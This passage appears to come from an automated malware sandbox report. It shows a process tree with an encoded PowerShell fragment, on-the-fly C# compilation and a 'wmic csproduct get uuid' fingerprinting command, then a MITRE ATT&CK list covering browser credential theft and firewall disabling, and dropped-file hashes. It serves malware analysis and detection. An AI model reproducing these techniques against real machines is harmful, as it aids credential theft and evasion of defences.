HAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mo0ndvv4\mo0ndvv4.cmdline"4⤵PID:4640
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78A6.tmp" "c:\Users\Admin\AppData\Local\Temp\mo0ndvv4\CSC822CCC1635946C9AE81394DD91FE38.TMP"5⤵PID:3748
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:3988
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:2336
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:3028 -
C:\Windows\system32\UserAccountControlSettings.exe"C:\Windows\system32\UserAccountControlSettings.exe"2⤵PID:2008
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:4684
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Permission Groups Discovery
1Local Groups
1Process Discovery
1Query Registry
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1System Network Connections Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
24.3MB
MD528ff0cac1b7a4225c599b7366f5afb42
SHA189562ab281aecd486f4d07e5cd6f1cb823459521
SHA256f6affa968b207a553f4825db54f148a2697c7a786eac16f83df8997a5ea85044
SHA512a88a332f72e38386eaf9c689df65f4762a1f9c67cab9a63f94beb199d9c04543ff16f522b2ebe180600b78f2fb3d0f49808349ab5dcaa3d5ef5153651c12c95d
-
Filesize
3KB
MD58740e7db6a0d290c198447b1f16d5281
SHA1ab54460bb918f4af8a651317c8b53a8f6bfb70cd
SHA256f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5
SHA512d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b
-
Filesize
152B
MD523b6e2531d39ba76e0604a4685249f2d
SHA15f396f68bd58b4141a3a0927d0a93d5ef2c8172f
SHA2564a486d7be440ddf2909be2c2b41e55f0666b02670bbf077ac435e3cddc55a15e
SHA512a1a7fef086526e65184f60b61d483848183ef7c98cf09f05ac9e5b11504696406120ab01da8ed7f35e3145aa5fc54307c9397770681e4d10feea64113e7a57cd
-
Filesize
152B
MD56ffd468ded3255ce35ba13e5d87c985a
SHA109f11746553fd82f0a0ddef4994dc3605f39ccec
SHA25633103b1e4da1933459575d2e0441b8693ba1ede4695a3d924e2d74e72becabd8
SHA5125d5530c57faa4711f51e4baef0d1f556937a5db1e2a54ee376c3556c01db0ddf628856f346057d3849baa5db35603b96a0a9894f3c65a80c947085eb640348ee
-
Filesize
124KB
MD5dffa16d45b2cc33eb93a10f821c59962
SHA13155e1a94c8d4a883cca4559ce7a7c8b84683d47
SHA256f088572d1d351f63e55316bb1270b8d5f0288eb48bac21d94ed1e51253aaaf73
SHA512d1ebd7e1884c7bc144d09a32070aa33631487534626524e8619168ec8439fe240dd01accc920386fbc5176689ce83e5d9eadbc75abcaa45f0de4257f83a1d325
-
Filesize
6KB
MD51df51efbac6a3df9b01ce96eb906adbe
SHA1517f3b2bac36d6c853c081b480e48a17d5dfdb24
SHA2564ff5789b17057c0156aac3eb502a52cf62f45e2a800166f7b1dbba51812aa32f
SHA5125efc097bf938f788ef839a4eeb9dca2013bfe5c0549738be43af4bbf6a93bdeee1172358d5d607c22751f9cb81448296d95fcf248600f797757c7022538031d0
-
Filesize
6KB
MD5a80ab4398efe5079c44141ef9cdab4af
SHA198fed52f322cbba347193064fece65d80beb4a3d
SHA25676c3ee06957a30ad39ad18a07a6431fb7077db850ed828d08972b218e0073c98
SHA5126a724148841495bbdd33767462d847c4f20708046469e00e3e543a056a53fab721a24410008684e3a264372057d120fedef5c11ceb0254c4be22f7c08bca6754
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD5ba4be0cee4efc90787eb112e73fd0268
SHA1239a359001a2692212d81426c8e31477f535f355
SHA256bdb1d6c839509e942efc517abf25622d5065b2a67495be46869a92c71d278163
SHA5125930b073295f5c8478fb57e1f481024e4702e27efe6f32402860709c3b6ab159fd592e83b7678ab999cdb62e0a8bf33fad566966628fb9c2bcf82c6be6025ca3
-
Filesize
10KB
MD53047a62d1572b572e4810f6b744f0a08
SHA18b54f335043e060fb1a1feceeb2d0f82828acd96
SHA25639b38a0dbd2b5dcdaf22d63e0b3fa74bf5b36a11d38c354476f6906f0cb8d210
SHA51263fb9d4dab564b5fba3c0258b9cd2b2f23f5c29e5f5a1c44228b983608024a63cdec10909489df6ef800c69a8c017f7639c2703285c71c2f51374263e9a98fbf
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
264KB
MD5a60dc92ed703b22e808a5e352220a5d6
SHA136509c1c0583bb05b4666ef47faff213b60e5ecc
SHA25605c9acd9c065dc4ed4d4de4433e0e64e057ebf1a176f98c3be06746a2840e1cc
SHA512e9a3b0ebfce87a1d188edb99dd3c8df1de3f8f9f57bb9893e4b3b7f99ca46464e8058f9fa01a7b33e7cd81b0b9251d187c25c9e1f8192cb0d79a2bdbc11c7925
-
Filesize
1KB
MD5d48e6be2981d2eda36a4d9a754fb9def
SHA1792b106f6a06b3d28d1579a302f4ed659a024ccd
SHA256ce31457b4b5c43037def5416ca331b3a695fcbe77149af234eeb6d16f094e3db
SHA5127729f0be066224ce875b1a755909a96bdd9a36380cf6c9c941e07773b922a49d0a7e1873ebc4e0b5e732279bf582c2d4afad5a7fc1dfe2e6c9b0b8eebdd61259
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD505697ec08613193f5702333eea9d1f77
SHA103ac9fb54612a47f1156ca0250fcc5b57a63e9e1
SHA2567f2b682218a03cd191a6982de821c278148b75bdccbf00999d05ba8e9344308c
SHA512afc54de9b1cbb748a15b2168f91507c7bdd8ca5cf77ffc6b7629a5f665a25bdabcca51500c9e4e3cc4f7460f639e5117838623b0b20439b2a7425dce15b35703
-
Filesize
652B
MD5cde65a756630436f36ada6b7dc5129e1
SHA1e8a996c9f7a22d6232ab0a6e8d1d00bc496cb7d5
SHA256bef5686d25f0d06bbcb4d2120b65e87a1a9695f9a4248daeeb639e04d88e6926
SHA51201ed80407ed80fc12f8d557ba7acf701d5fd4bc4311469c79532a9842abc3af6f1acd7babeda4b37f49cef1388628efd211c6fd3bc42c05712d521096dc925ea
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5a864b446a1993127b1aa119349f53cec
SHA140441714168633b0609bb60b7d6d5f04344dbe94
SHA2568aa376b0bca8a5c57878952e17ad4fe6e5d3cc7746fc9945c7db26817b6610d6
SHA512dacb68b49b93ffe4cd2313b93a8a77e86b99555112e97ea5f7c8a9d8c8d6020b501701114e4e492bd40cc29525dc9f4db46f921ba7b0bf505b2d870c625d14bc